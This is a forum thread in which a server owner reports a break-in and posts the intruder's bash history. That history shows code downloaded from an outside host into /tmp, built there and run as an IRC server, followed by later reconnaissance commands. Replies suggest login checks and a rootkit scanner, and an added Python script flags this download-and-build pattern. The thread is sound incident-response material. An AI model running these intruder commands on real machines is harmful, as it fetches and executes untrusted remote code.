Anybody hacked my PC?


Locked
Darkness
Posts: 2
Joined: Fri Sep 10, 2010 9:33 am

Anybody hacked my PC?

Post by Darkness »

Hi,

I need help with this topic. I hope somebody can tell me something!

I noticed this morning that my root password had changed. After recovering it, I saw a new user on my server called "c". This is what I found in the bash_history of that user:
cd /tmp
wget http://www.unrealircd.com/downloads/Unr ... 8.1.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit
Does anyone know what this is?

I found nothing in bash_history of the root user. I suppose he deleted it.


Thanks !!!
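Added example, not part of the original thread: a small Python triage pass over a shell history that tracks the working directory and reports downloads, builds and local executions that happen under world-writable directories, which is the pattern visible in the history posted above. The sample history, host names, directory list and function names are constructed for illustration.

```python
import posixpath

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")
DOWNLOADERS = {"wget", "curl"}
BUILDERS = {"make", "gcc", "cc"}

# Constructed sample modelled on the pattern in the thread; hosts are placeholders.
SAMPLE_HISTORY = """\
cd /tmp
wget http://downloads.example/ircd.tar.gz
tar -zxvf ircd.tar.gz
cd ircd
./Config
make
cd src/modules
wget http://files.example/extra.c
cd ..
cd ..
./ircd start
""".splitlines()


def in_world_writable(path):
    return any(path == d or path.startswith(d + "/") for d in WORLD_WRITABLE)


def triage_history(lines, home="/home/user"):
    """Return (line_no, category, cwd, command) for download/build/execute
    activity seen while the tracked working directory is world-writable."""
    cwd, findings = home, []
    for no, raw in enumerate(lines, 1):
        argv = raw.split()
        if not argv:
            continue
        cmd = argv[0]
        if cmd == "cd":
            # Only plain paths are tracked; "cd -" and "cd ~user" are not resolved.
            target = argv[1] if len(argv) > 1 else home
            cwd = posixpath.normpath(posixpath.join(cwd, target))
            continue
        if not in_world_writable(cwd):
            continue
        if cmd in DOWNLOADERS:
            findings.append((no, "download", cwd, raw))
        elif cmd in BUILDERS:
            findings.append((no, "build", cwd, raw))
        elif cmd.startswith("./"):
            findings.append((no, "execute", cwd, raw))
    return findings
```

History files are writable by the account that owns them, so an empty result from this check is not evidence that the account did nothing.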
katsklaw
Posts: 1124
Joined: Sun Apr 18, 2004 5:06 pm

Re: Anybody hacked my PC?

Post by katsklaw »

Sounds hacked to me.

You can do last c as root and see when and from what IP they connected. Please bear in mind that if you were hacked, the hacker would be stupid if he didn't bounce to your box, and the IP is most likely not his/her real one, but you'll have an idea of when it happened.
Darkness
Posts: 2
Joined: Fri Sep 10, 2010 9:33 am

Re: Anybody hacked my PC?

Post by Darkness »

No doubt. It was hacked.

He reconnected about one hour ago, this is what he tried:
w
lastlog
suid
id
uname 0a
uname -a
lastlog
cd /tmp
ls
cd .,
ls -a
exit
I had deleted his changes at /tmp before, so he exited. I have just changed the password of "c".

Now I have to try to recover the system status and delete the rootkits that he installed to get the password (need help with that). I posted this in another forum (Spanish): http://www.espaciolinux.com/foros/post2 ... ml#p238645 I will translate it here later.

Ah, his IP:
c pts/0 173-203-192-173. Fri Sep 10 15:26 - 15:27 (00:00)


Thanks a lot!!
katsklaw
Posts: 1124
Joined: Sun Apr 18, 2004 5:06 pm

Re: Anybody hacked my PC?

Post by katsklaw »

I suggest rootkit hunter found at http://www.rootkit.nl/